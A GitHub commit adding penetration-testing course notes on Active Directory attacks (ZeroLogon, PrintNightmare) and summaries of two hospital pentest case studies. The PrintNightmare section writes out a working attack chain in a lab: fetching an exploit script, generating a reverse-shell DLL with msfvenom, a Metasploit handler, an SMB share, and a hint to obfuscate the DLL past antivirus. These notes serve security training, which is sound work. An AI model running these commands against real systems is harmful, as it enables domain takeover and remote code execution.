-
Notifications
You must be signed in to change notification settings - Fork 10
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
aa73b2f
commit 86e9a2e
Showing
4 changed files
with
153 additions
and
10 deletions.
There are no files selected for viewing
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,2 +1,80 @@ | ||
| # AD - Additional Attacks | ||
|
|
||
| ## ZeroLogon | ||
|
|
||
| ➡️ [**ZeroLogon**](https://www.trendmicro.com/en_us/what-is/zerologon.html) is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller. | ||
|
|
||
| The **Zerologon vulnerability (CVE-2020-1472)** is a critical flaw in Microsoft's **Netlogon Remote Protocol (MS-NRPC)** that affects **Active Directory (AD) domain controllers**. Zerologon allows an unauthenticated attacker with network access to a domain controller to establish a vulnerable Netlogon session and eventually gain domain administrator privileges. | ||
|
|
||
| The vulnerability arises from a flaw in the **cryptographic implementation of the Netlogon protocol**, enabling attackers to impersonate any computer, including the root domain controller. By exploiting this, an attacker can effectively take over the entire domain. | ||
|
|
||
| This is a very dangerous attack, not worth the risk of running it in a pentest. | ||
|
|
||
| - [ZeroLogon testing script](https://github.com/SecuraBV/CVE-2020-1472) | ||
|
|
||
| ```bash | ||
| mkdir -p $HOME/tcm/peh/ad-attacks/zerologon | ||
| cd $HOME/tcm/peh/ad-attacks/zerologon | ||
| git clone https://github.com/dirkjanm/CVE-2020-1472.git | ||
| wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/refs/heads/master/zerologon_tester.py | ||
|
|
||
| python3 zerologon_tester.py hydra-dc 192.168.31.90 | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| - Proceed with the attack using [dirkjanm/CVE-2020-1472: PoC for Zerologon](https://github.com/dirkjanm/CVE-2020-1472) if the target is vulnerable. | ||
|
|
||
| --- | ||
|
|
||
| ## PrintNightmare | ||
|
|
||
| > - [Playing with PrintNightmare | 0xdf hacks stuff](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) | ||
| ➡️ The [**PrintNightmare**](https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution) vulnerability refers to critical security flaws in the Windows **Print Spooler service**, identified as **CVE-2021-1675** and **CVE-2021-34527**. | ||
|
|
||
| PrintNightmare is a critical **remote code execution** and **local privilege escalation** vulnerability that allows attackers to execute arbitrary code with **SYSTEM** privileges, enabling them to install programs, modify data, or create new accounts with full user rights. **Exploitation can occur remotely or locally**, even on fully patched systems, if certain registry settings are misconfigured. Microsoft has released patches to address these issues, however, systems with specific registry configurations may remain vulnerable. | ||
|
|
||
| ```bash | ||
| # Impacket | ||
|
|
||
| # Scanning | ||
| rpcdump.py @192.168.31.90 | egrep 'MS-RPRN|MS-PAR' | ||
|
|
||
| Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol | ||
| Protocol: [MS-RPRN]: Print System Remote Protocol | ||
| # DC could be vulnerable | ||
|
|
||
| # Attacking | ||
| mkdir -p $HOME/tcm/peh/ad-attacks/printnightmare | ||
| cd $HOME/tcm/peh/ad-attacks/printnightmare | ||
| wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/refs/heads/main/CVE-2021-1675.py | ||
|
|
||
| # Open second terminal - Generate dll payload | ||
| msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=5555 -f dll > shell.dll | ||
| msfconfole | ||
| use multi/handler | ||
| set payload windows/x64/shell_reverse_tcp | ||
| set LPORT 5555 | ||
| set LHOST 192.168.31.131 | ||
|
|
||
| # Open third terminal - setup a file share | ||
| smbserver.py share `pwd` -smb2support | ||
|
|
||
| # Run attack | ||
| python3 CVE-2021-1675.py marvel.local/fcastle:[email protected] '\\192.168.31.131\share\shell.dll' | ||
| ``` | ||
|
|
||
| - The attack was executed on a fully patched **Windows Server 2022**, and if it failed, it is most likely due to the applied security patches. | ||
| - The `dll` may need to be obfuscated to bypass AV detection. | ||
|
|
||
| ```bash | ||
| # CVE-2021-1675.py output | ||
| [*] Connecting to ncacn_np:192.168.31.90[\PIPE\spoolss] | ||
| [+] Bind OK | ||
| [-] Failed to enumerate remote pDriverPath | ||
| RPRN SessionError: unknown error code: 0x8001011b | ||
| ``` | ||
|
|
||
| --- | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1 +1,62 @@ | ||
| # AD - Case Studies | ||
| # AD - Case Studies | ||
|
|
||
| ## Case study #1 | ||
|
|
||
| > - [AD Case Study #1 - You Spent How Much on Security? - TCM Security](https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security/) | ||
|
|
||
| This case study details a **penetration test** conducted on a **well-funded U.S. hospital** with a strong security infrastructure, including **IDS/IPS, CyberArk PAM, Symantec Endpoint Security, and proper patch management**. Despite these defenses, testers found **critical security gaps** that could be exploited. | ||
|
|
||
| **Key Findings:** | ||
|
|
||
| - **SMB Relay Attack Exposure:** | ||
| - LLMNR/NBNS poisoning was **mitigated**, but **SMB relay attacks** were still possible | ||
| - Attackers could use **NTLM relaying** to escalate privileges | ||
| - **Privilege Escalation Risks:** | ||
| - Misconfigurations and local users easy-reused hashes/passwords allowed **privilege escalation**, leading to potential **Domain Admin access** | ||
| - Weak **Active Directory hardening** left **high-value targets exposed** | ||
| - **Security Investment ≠ Full Protection:** | ||
| - Even with expensive security solutions, **configuration weaknesses** left the network vulnerable | ||
| - **Lateral movement & persistence techniques** were viable due to **improper segmentation** and **overprivileged accounts** | ||
|
|
||
| **Key Takeaways:** | ||
|
|
||
| - **Network segmentation & NTLM hardening** are critical | ||
| - **Regular security assessments** are needed despite high investment in security tools | ||
| - **Least privilege enforcement** should be a priority to prevent escalation | ||
|
|
||
| This case study highlights how **misconfigurations and overlooked weaknesses** can lead to **serious security risks**, even in well-funded environments. | ||
|
|
||
| --- | ||
|
|
||
| ## Case study #2 | ||
|
|
||
| > - [AD Case Study #2 - #Pentest Tales #002: Digging Deep - TCM Security](https://tcm-sec.com/pentest-tales-002-digging-deep) | ||
|
|
||
| This case study outlines a **penetration test** on a **well-funded U.S. hospital** with solid security measures, including **LLMNR/IPv6 disabled, SMB Signing enforced, IDS/IPS, and patched systems**. Despite these controls, the assessment revealed **critical security gaps** that could be exploited. | ||
|
|
||
| **Key Findings:** | ||
|
|
||
| - **Default Credentials on Development Apps:** | ||
| - A **development environment application** was found using **default credentials**, granting unauthorized access. | ||
| - Attackers could **leverage this access** to extract **sensitive information**. | ||
| - **Local Administrator Password Reuse:** | ||
| - The **same local admin password** was used across multiple machines. | ||
| - Once a **single system** was compromised, **lateral movement** became trivial. | ||
| - **WDigest Enabled on Legacy Systems:** | ||
| - Older systems had **WDigest enabled**, storing **plaintext credentials** in memory. | ||
| - Attackers could extract **Domain Admin credentials** using tools like **Mimikatz**. | ||
| - **Overprivileged Service Accounts:** | ||
| - Service accounts had **Domain Admin** privileges unnecessarily. | ||
| - Compromising one of these accounts **led to full domain compromise**. | ||
|
|
||
| **Key Takeaways:** | ||
|
|
||
| - **Enforce unique local admin passwords** across endpoints (**LAPS**). | ||
| - **Disable WDigest** on all systems to prevent plaintext credential exposure. | ||
| - **Restrict service account privileges** to the **minimum necessary**. | ||
| - **Regular security assessments** are necessary, even with strong security investments. | ||
|
|
||
| This case highlights how **misconfigurations and weak credential management** can undermine otherwise strong defenses, making **lateral movement and domain compromise easy** for attackers. | ||
|
|
||
| --- | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters